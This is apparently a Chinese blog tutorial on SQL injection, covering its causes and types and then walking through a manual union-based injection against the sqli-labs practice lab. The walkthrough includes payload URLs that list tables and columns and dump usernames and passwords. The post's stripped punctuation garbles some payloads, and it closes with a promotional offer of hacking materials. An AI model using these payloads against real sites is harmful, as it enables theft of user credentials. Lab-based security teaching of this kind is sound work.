网络安全——SQL注入漏洞
一、SQL注入概述1、SQL注入漏洞攻击者**利用Web应用程序对用户输入验证上的疏忽在输入的数据中包含对某些数据库系统有特殊意义的符号或命令**让攻击者有机会直接对后台数据库系统下达指令进而实现对后台数据库乃至整个应用系统的入侵。2、SQL注入原理**服务端没有过滤用户输入的恶意数据直接把用户输入的数据当中SQL语句执行**攻击者从而获得数据库中的数据影响数据库安全和平台安全实现SQL注入的两个条件用户能够控制输入原本程序要执行的SQL语句拼接了用户输入的恶意数据3、SQL注入过程4、SQL注入带来的危害5、SQL注入示例–空格是注释的意思注释掉后面的语句二、SQL注入分类1、按照注入点类型分类1数字型整型注入例sqli-labs的第一关使用火狐浏览器的hackbar在靶机地址后加?id8 and 12没有反应2字符型注入字符串注入测试方法3搜索型注入2、按照注入技术执行效果分类三、SQL注入漏洞形成的原因1、动态字符串构建引起2、后台存在的问题后台无过滤或者编码用户数据数据库可以拼接用户传递的恶意代码3、错误处理不当详细的内部错误信息显示给用户或者攻击者错误信息可以直接给攻击者提供下一步攻击帮助4、不安全的数据库配置四、寻找SQL注入点1、GET方法一种请求服务器的HTTP方法使用该方法时信息包含在URL中点击一个链接时一般会使用该方法2、POST方法POST是一种向Web服务器发送信息的HTTP方法数据无法在URL中看到可以抓包也可以用Hackbar中的POSTPOST可以发送字节大的数据3、其他注入点Cookie、Host、User-Agent4、关于注入点的总结只要后台接收前台输入的数据而且没有对数据进行过滤最后直接进入到数据库从而构成威胁五、SQL注入过程1、手工注入利用sqli-labs靶机的第二关1判断是否存在注入点2、判断字段长度也就是表中数据有多少列利用order by 语法如下图为什么-- 后面不是空格是呢因为用代替空格以免空格被后面隐藏的固定语句吃掉使–不起作用到了4就报错说明有3个字段3、判断字段回显位置由上一步我们知道有3个字段我们可以利用union语法如下图and 12 是与条件使前面的语句失效执行union后面的查询从而判断出回显位置http://[靶机IP]/sqli-labs/Less-2/?id1 and 12 union select 1,2,3--4判断数据库信息和查询数据库名http://[靶机IP]/sqli-labs/Less-2/?id1 and 12 union select 1,2,database()--5查询数据表http://[靶机IP]/sqli-labs/Less-2/?id1 and 12 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity--6查找数据库表中所有字段以及字段值http://[靶机IP]/sqli-labs/Less-2/?id1 and 12 union select 1,2,group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers--7猜解账号密码http://[靶机IP]/sqli-labs/Less-2/?id1 and 12 union select 1,2,concat_ws(,,id,username,password) from security.users limit 0,1--以此类推可通过修改limit后面的参数将users表中存放的所有用户信息全部暴露出来。如何系统学习网络安全网络安全作为数字时代的核心技术基石已成为保障各行业安全稳定运行的坚实屏障。筑牢网络安全的防线掌握先进的防护策略和技能正上升为国家与企业发展的战略优先级。构建稳固的网络安全能力是一个体系的工程需要从夯实基础理论出发持续深化到攻防对抗与应急响应的实战层面。如果你是准备学习网络安全黑客或者正在学习我可以把我自用的360独家内部资料分享给你包含以下内容你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】